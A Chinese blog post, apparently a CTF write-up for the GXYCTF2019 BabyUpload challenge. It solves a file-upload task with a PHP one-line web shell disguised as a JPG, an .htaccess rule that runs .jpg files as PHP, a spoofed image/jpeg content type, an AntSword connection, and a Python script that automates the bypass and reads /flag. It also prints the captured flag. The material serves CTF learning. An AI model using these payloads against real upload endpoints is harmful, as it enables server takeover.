[upload]-[GXYCTF2019]BabyUpload1-笔记

已于 2024-08-13 10:00:02 修改
阅读量397 收藏
点赞数 1
分类专栏: ctf 文章标签: upload
于 2024-08-13 09:51:28 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/mails2008/article/details/141155234
版权

尝试上传.htaccess和图片和一句话木马提示

 php文件提示

 响应头可以看到

 构造一句话图片木马如下:

<script language='php'>eval($_POST['cmd']);</script> 上传成功

 必须增加文件夹下jpg后缀解析php

.htaccess如下

<FilesMatch "jpg">

  SetHandler application/x-httpd-php

</FilesMatch>

需要修改文件类型,image/jpeg,如下,上传成功

蚁剑链接

根据刚才上传图片木马的地址,用蚁剑链接如下

http://a756579c-2d99-4546-b126-d1099134f355.node5.buuoj.cn:81/upload/5337bb98317fcb575ce52329036efce2/u1.jpg

 根目录下发现flag

flag{b35d29a2-b3da-42db-9f8b-9ca91436173e}

参考python方案:

import requests
url = "http://172.21.4.12:10011/"
session = requests.session()
htaccess = {'uploaded': ('.htaccess', "SetHandler application/x-httpd-php", 'image/jpeg')}
res_hta = session.post(url, files=htaccess)

files = {'uploaded': ('123.jpg', "<script language=\"php\">echo file_get_contents(\"/flag\");</script>", 'image/jpeg')}
res_jpg = session.post(url, files=files)

res_shell = session.post(url + res_jpg.text[-69:-22], data = {'a':'echo file_get_contents(\'/flag\');'})

print(res_shell.text)

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值